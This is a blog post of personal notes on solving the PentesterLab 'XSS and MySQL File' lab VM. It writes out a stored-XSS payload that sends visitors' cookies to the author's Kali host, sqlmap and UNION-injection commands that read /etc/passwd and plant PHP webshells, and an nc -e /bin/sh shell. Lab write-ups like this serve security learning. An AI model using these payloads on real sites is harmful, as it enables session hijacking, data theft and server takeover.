Skip to main content

VM 10 : XSS & MySQL

Walkthru:

1. https://www.sw1tch.net/2014/06/18/walkthrough-for-pentester-lab-xss-and-mysql-file/ [ xss, grab cookie,sqlmap blind injection, sqlmap dump database, sqlmap php reverse shell,]

2. http://f4l13n5n0w.github.io/blog/2015/05/09/pentesterlab-xss-and-mysql-file/ [Union Based Injection, getting db info via url and uploading webshell via url. not working]

3. http://wg135.github.io/blog/2016/04/12/pentesterlab-xss-and-mysql-file/ []

Notes:

https://gnahackteam.wordpress.com/2012/06/08/union-based-basic-sql-injection/ 
[how to perform Union-Based (Basic) SQL Injection steps]

1. Added to potential fields to see which one them is vulnerable to CSS

 <script>alert('vulerable')</script>

this alert is sitting in the comments field and will show up when the page is loaded

2. Next we are going to add a URL pointing to Kali PHP server  (cookie grabing code) in the comment field. Also create a php page  that we would serve when the client comes.

3. content of index-css.php
==============
<?php
$cookie = isset($_GET["test"])?$_GET['test']:'';
?>
=================

4  start a php server and point it to the file.

#php -S 172.16.2.38:80

5. In the text field which is vulnerable to CSS of the page add
  <script>location.href='http://kali.ip.addr/index-css.php?test='+document.cookie;</script>

6. when the page is loaded, it would call the link and leak the session id at the kali console which attacker can grab and use cookie manager to load it in the browser and potentially login with admin. We may see  different cookie appearing as we wait and have to try different ones to get access. anyone going to see the comment, we will get their cookie

7. Use  the cookie and upload the reverse shell to server. This is not working 100%of the time. Was able to upload the file to either /class or /css but not able to do it any more. Walkthru shows user cannot add files to /class  but can do to /css but for me getting " no write privileges " in sqlmap

sqlmap -u "http://172.16.2.23/admin/edit.php?id=1" --cookie=PHPSESSID=vnr6qcb9s8qb1365mt6l10s830 --file-write="/var/www//html/php-reverse-shell.php" --file-dest="/var/www/css/basic999.php"

============

2. http://f4l13n5n0w.github.io/blog/2015/05/09/pentesterlab-xss-and-mysql-file/ [ getting db info via url and uploading webshell via url]

Exploit MySQL injection vulnerability and uploading webshell

SQL Injection point:
http://192.168.1.149/admin/edit.php?id=2
Try single quote:
http://192.168.1.149/admin/edit.php?id=2′
Results:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /var/www/classes/post.php on line 111 Notice: Undefined variable: post in /var/www/classes/post.php on line 115
Now the attacker know the target web site’s absolute path is “/var/www/”
Detect backend DB information
attacking code:
http://192.168.1.149/admin/edit.php?id=2 order by 4 — – (OK)
http://192.168.1.149/admin/edit.php?id=2 order by 5 — – (ERROR)

http://192.168.1.149/admin/edit.php?id=-2 union select 1,@@version,user(),4
[
-2 =...you can simply invalidate the first query so that it wont give any output and eventually your output will become the one and only output to be printed
@@versionVersion of DB
user () = Current User
..source@http://www.securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html . Look for Union Based Injection
 ]
Results:











1
2

Mysql Version: 5.1.72-2
current DB user: root@localhost

Due to MySQL is now runnnig by root, the attacker will grain root privilege....
Use the following site to decode/encode the URL

 "2 union select 1,2,"<?php @eval($_POST['chopper'])?>",4 into outfile "/var/www/css/t2.php"- -"
turns into
"2%20union%20select%201%2C2%2C%22%3C%3Fphp%20%40eval%28%24_POST%5B%27chopper%27%5D%29%3F%3E%22%2C4%20into%20outfile%20%22/var/www/css/t2.php%22-%20-"
source [https://www.base64convert.com/url-decoder]

but it is not working when I execute the url, i get error,  dont see the file created in the CSS folder
============
3. http://wg135.github.io/blog/2016/04/12/pentesterlab-xss-and-mysql-file/ []
 In order to perform a request by SQL injection, you need to find the number of columns that are returned by the first part of the query. Unless you have the source code of the application, you will have to guess this number.

There are two methods to get this information:
1 using UNION SELECT and increase the number of columns;
2 using ORDER BY statement.
Here we use order by statement to get the number of columns
http://192.168.79.168/admin/edit.php?id=2 order by 4 -- good http://192.168.79.168/admin/edit.php?id=2 order by 5 -- error
Now that we know the number of columns, we can retrieve information from the database. Based on the error message we received, we know that the backend database used is MySQL.
get DB version:
http://192.168.79.168/admin/edit.php?id=0%20UNION%20SELECT%201,2,@@version,4
get /etc/passwd file:
http://192.168.79.168/admin/edit.php?id=0%20UNION%20SELECT%201,2,load_file("/etc/passwd"),4
get user info:
http://192.168.79.168/admin/edit.php?id=0%20UNION%20SELECT%201,2,user(),4
since the user is root, now we can deploy a webshell…
use http://192.168.79.168/admin/edit.php?id=0 UNION SELECT 1,2,"<?php @eval($_POST['pass'];)?>",4 into outfile "/var/www/css/evil.php" to create evil.php under css folder. Encode 0 UNION SELECT 1,2,"<?php @eval($_POST['pass'];)?>",4 into outfile "/var/www/css/evil.php" part.
Goto to upload a file
http://172.16.2.23/admin/edit.php?id=0%20UNION%20SELECT%201%2C2%2C%22%3C%3Fphp%20%40eval%28%24_POST%5B%27pass%27%5D%3B%29%3F%3E%22%2C4%20into%20outfile%20%22/var/www/css/evil.php%22

source [https://www.base64convert.com/url-decoder]

 Now we can see that the evil.php is created successfully.
Cool… Lets write webshell now
http://192.168.79.168/admin/edit.php?id=0 UNION select 1,2,"<?php system($_GET['c']); ?>",4 into outfile "/var/www/css/webshell.php"
of course. encode 0 UNION select 1,2,"<?php system($_GET['c']); ?>",4 into outfile "/var/www/css/webshell.php"
Now run command:
http://192.168.79.168/css/webshell.php?c=cat /etc/passwd
encode /etc/passwd (Not sure how this is beneficial so I ran nc -l -p 444 -e /bin/sh and nc victimip 444 and it got be connected as www-user )



============

Comments

Post a Comment

Popular posts from this blog

VM 9 : PHP Include And Post Exploitation

Walkthrough 1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2.        Ine [] 3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT    STATE SERVICE 80/tcp open   http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...
1 comment
Read more

VM 5: Vulnix :

Walkthru: A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs] B. http://overflowsecurity.com/hacklab-vulnix/ [ same as above. create ssh keys for root and copied to victim to login as root w/o recovering pwd] C. https://www.rebootuser.com/?p=988[ local bash shell from nfs] B. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions] D. https://www.rebootuser.com/?p=988 [User Enumeration #1 – SMTP, Finger; Entry Point including hydra, Putty(using rlogin service), nfs (showmount,mount) ] Notes: - As you can see the root user is the only account which is logged on the remote  host.Now that we have a specific username we can use it in order to obtain more information about this user with the command  finger root@host . -  Another effective use of the finger...
Post a Comment
Read more

VM 13 : Basic Pentest 1 csec

Notes: Walkthru: 1. https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [ w/metasploi t using Wordpress t] 2. https://prasannakumar.in/infosec/vulnhub-basic-pentesting-1-writeup/ [ w/metasploit using ftp ] 3.  https://www.ceos3c.com/hacking/basic-pentesting-1-walkthrough/ [ by uploading php-reverse-shell in wordpress ] 4. http://k3ramas.blogspot.com/2018/02/basic-pentesting-1-walkthrough.html [  access wordpress config file to get pwd and access the DB ] 5.  https://cowsayroot.com/walkthrough-basic-pentesting-1/ [ Wpscan, ftp metasploit vulnerability, phpbash ] 6.   http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/    [use msfvenom to create  to create php shell to be uploaded in Wordpress ] 7.   https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding command using using PHP] Notes:  Ports - 21...ProFTPD 1.3.3c - 22 openSSH 7.2p2 ubuntu ...
2 comments
Read more